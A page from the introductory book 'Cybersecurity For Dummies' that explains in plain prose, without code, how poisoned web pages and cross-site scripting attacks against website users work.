Читать книгу Cybersecurity For Dummies - Joseph Steinberg - Страница 72

Many different types of attacks leverage vulnerabilities in servers, and new weaknesses are constantly discovered, which is why cybersecurity professionals have full-time jobs keeping servers safe. Entire books — or even several series of books — can be written on such a topic, which is, obviously, beyond the scope of this work.

That said, it is important for you to understand the basic concepts of server-based attacks because some such attacks can directly impact you.

One such form of attack is a poisoned web service attack, or a poisoned web page attack. In this type of attack, an attacker hacks into a web server and inserts code onto it that causes it to attack users when they access a page or set of pages that the server is serving.

For example, a hacker may compromise the web server serving www.abc123.com and modify the home page that is served to users accessing the site so that the home page contains malware.

But a hacker does not even need to necessarily breach a system in order to poison web pages!

If a site that allows users to comment on posts isn't properly secured, for example, it may allow a user to add the text of various commands within a comment — commands that, if crafted properly, may be executed by users’ browsers any time they load the page that displays the comment. A criminal can insert a command to run a script on the criminal’s website, which can receive the authentication credentials of the user to the original site because it is called within the context of one of that site’s web pages. Such an attack is known as cross-site scripting, and it continues to be a problem even after over a decade of being addressed.